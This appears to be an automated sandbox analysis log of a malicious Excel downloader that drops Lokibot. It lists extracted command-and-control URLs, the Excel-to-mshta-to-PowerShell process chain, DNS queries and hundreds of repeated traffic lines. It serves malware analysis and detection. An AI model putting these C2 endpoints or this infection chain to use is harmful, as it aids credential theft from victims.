                Source: 16.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cd\u00cd\u00cf\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxReversingLabs: Detection: 36%
                Source: SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdbhP source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.pdb source: powershell.exe, 00000006.00000002.452706193.00000000038C8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000010.00000002.621438972.0000000000B72000.00000020.00000001.01000000.0000000B.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,16_2_00403D74

                Software Vulnerabilities

                barindex
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: global trafficDNS query: name: mpa.li
                Source: global trafficDNS query: name: mpa.li
                Source: global trafficDNS query: name: drive.google.com
                Source: global trafficDNS query: name: drive.usercontent.google.com
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.159.62.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 5.159.62.243:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.186.46:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.217.16.193:443
